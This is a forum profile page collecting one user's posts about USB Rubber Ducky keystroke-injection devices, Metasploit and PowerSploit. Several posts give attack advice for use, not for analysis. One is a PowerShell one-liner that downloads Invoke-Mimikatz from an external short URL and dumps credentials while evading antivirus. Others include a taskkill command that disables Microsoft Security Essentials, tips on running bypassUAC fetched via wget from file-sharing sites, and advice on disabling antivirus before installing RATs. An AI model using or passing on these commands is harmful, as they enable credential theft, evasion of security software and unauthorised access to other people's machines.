Everything posted by MB60893

  1. Hmm. If you are using a command prompt, then I would recommend just storing the files in the path variable %USERPROFILE%. You can even change directories to this as well by cd %USERPROFILE%. With regards to the other problems, try doing this first. Often you won't be able to do a lot of ducky things without finding a way to invoke UAC Privileges.
  2. Well, that would call for building your own compiler to write scripts as beautifully simplistic as duckyscript, and even then you would need to make sure that your teensy was compatible with other systems. Just support Hak5 and use their ducks.
  3. I am not sure about this. I recommend injecting a file through a java applet or something along those lines. Good Luck!
  4. Nice. I really appreciate your help with this. Don't worry about me breaking any computer systems which I shouldn't be on. I am just demonstrating how you can exploit several vulnerabilities in systems with tools in memory. It is really a test which I am demonstrating.
  5. EDIT ON POST: Is it possible to use the bypassUAC exploit on a machine with no privileges? I imagine not, but I need this to work. Any ideas?
  6. Marvelous. I am new to Metasploit and I have the framework edition. To run the meterpreter, do I need a Linux-based OS, or can I use Cygwin or some other terminal emulator to get things done on my Windows machine? (I don't want to use the community edition if I can help it!) :)
  7. Hi everyone, I have seen the PowerSploit script on how Mimikatz can be loaded entirely into memory and used to dump credentials, and I was thinking would it be possible to load a program from metasploit, like bypassuac, which would usually be detected by an antivirus program into memory and use it from there? This could give you admin access to just about anything. Sadly, my knowledge on how to do this is lacking. If anyone could help with this, it would be much appreciated! :) Cheers, MB60893
  8. You could always use a VBScript to detect when the drive is there, then write the ducky drive letter to a .bat file. Then execute that. Best thing is the VBScript won't be shown in any kind of console/terminal, so you are really going to make the script covert! EDIT: I see that a newer VBScript has been added with the same properties. Just use that and modify if you have any further troubles.
  9. You are never going to be perfect with your antivirus detection and disabling techniques in any case. Your best bet is just to find a way of not triggering an AV.
  10. Else just use CTRL ESC, or CONTROL ESCAPE, and that will bring up the Start Menu. Not a noobish thing to say at all, I got stuck with this myself for an extensive period of time! :P
  11. Hi again Lavanoid, Check out PowerSploit and the section on Bypassing Antivirus. What this script does is it checks for a trace of an Antivirus, then the other programs kill the processes of the AV. Works great on my machines (quite extensive). Cheers, MB60893
  12. Not yet. HOWEVER, you should check out PowerSploit, especially the section on AntiVirus. Basically, it is a powershell script which will pick up an antivirus signature, which can then be used to disable the antivirus that you have.
  13. Trinity Rescue Toolkit. Really useful, especially if you put all of these boot CDs on a USB key. See project "USB Multipass" in Hak5 Forums.
  14. I have had this problem recently myself. You can use something like SkyDrive, though. Make an account, and share the file with properties "Edit". No one unless they get the URL or can guess correctly out of the millions of combinations will be able to download the file. Give it a go. The link doesn't change either.
  15. Cool Trick! You could even go a step further and write a script which keeps changing the click every few seconds!
  16. Check This out: http://www.thingiverse.com/thing:194826. Someone in the Hak5 Forums designed this case, and you can specify a 3D printer to print in transparent colours. Fits the duck and you can get it printed from a place near you cheaply from: http://www.makexyz.com/3dprinters/.
  17. Hi again Lavanoid, You can use this fantastic script which uses mimikatz, and it doesn't set off any antivirus. powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" You do need the administrative rights to run the powershell with this script, but it does work, and it won't make your AV go berserk because it uses Mimikatz from in memory, meaning no need for procdump as well! Give it a go! MB60893.
  18. The thing about the duck is that it is acting as a USB Keyboard, so it is very hard for antivirus programs to detect. The thing that may make it not work is that the driver that is downloaded for the Ducky to work reads "HID - Human Interface Device". Aside from that, some keyboards come up with this, and they are not detected by any antivirus software. If you are trying to do miscellaneous things with the ducky, then certain antivirus programs may pick up the activity. The best thing to do is to start up a command prompt and disable the service or live monitoring processes of the antivirus program. For Microsoft Security Essentials, it is as simple as: "taskkill /f /im msseces.exe /t" For some other programs, it may be a matter of deleting a registry entry to stop it on startup. It is a good thing to watch out for when installing RATS and more.
  19. Well if you can't count on it, then you might need to put up a delay up to a minute or so. It is something that we can't really predict, unless you manually install the driver off of a USB key, but that can also take time, and is generally slower than using the ducky. Sorry.
  20. If you type "USB Rubber Ducky Repeat" into google, you get the Hak5 page which says Firmware V2.4 released, and "Added Repeat Command". This means that your duck must be less than V2.4. You should update the duck ASAP if you wish to do this duckyscript justice! :)
  21. You are in luck. There is a tool in the Metasploit Framework which allows administrative access to be used. Only thing is that Microsoft Security Essentials recognises the bypassuac program as potentially malicious. An easy fix to this is to kill any monitoring security programs with the command line utility task "Taskkill /f /im msseces.exe /t" and that should make everything work great! Just do some research on your target machine and check what antivirus they have, then use a wget from powershell to download and use the application. Good luck with this, it sounds like a fantastic project and I can't wait to have a look at the duckyscript behind it!! :)
  22. Just backing up about MediaFire and all other sites where you can download files etc, make sure you right click the button and copy the link address. If this doesn't work just inspect the button element and copy the URL.
  23. While this is a good idea, I still only wish to modify the source code, hence why I am still leaving this thread as unsolved. Thanks everyone so far, but please keep these ideas coming!
  24. You could always use the metasploit tool "BypassUAC". Works great and with a simple wget off of a service like MediaFire or DropBox, it is a no brainer. Just remember to disable pesky antivirus! :D
  25. Hi, If you want to detect the drive, then I suggest doing what was done in Hak5 episode of Ducky Exfiltration (one of the earliest episodes of season 15) and create a drive with a name like ducky, so that it will be able to detect where the update software is, then it should run and get all the files off of the USB. Just modify your batch script to do this and you should be hunky-dory! :) Cheers, MB60893.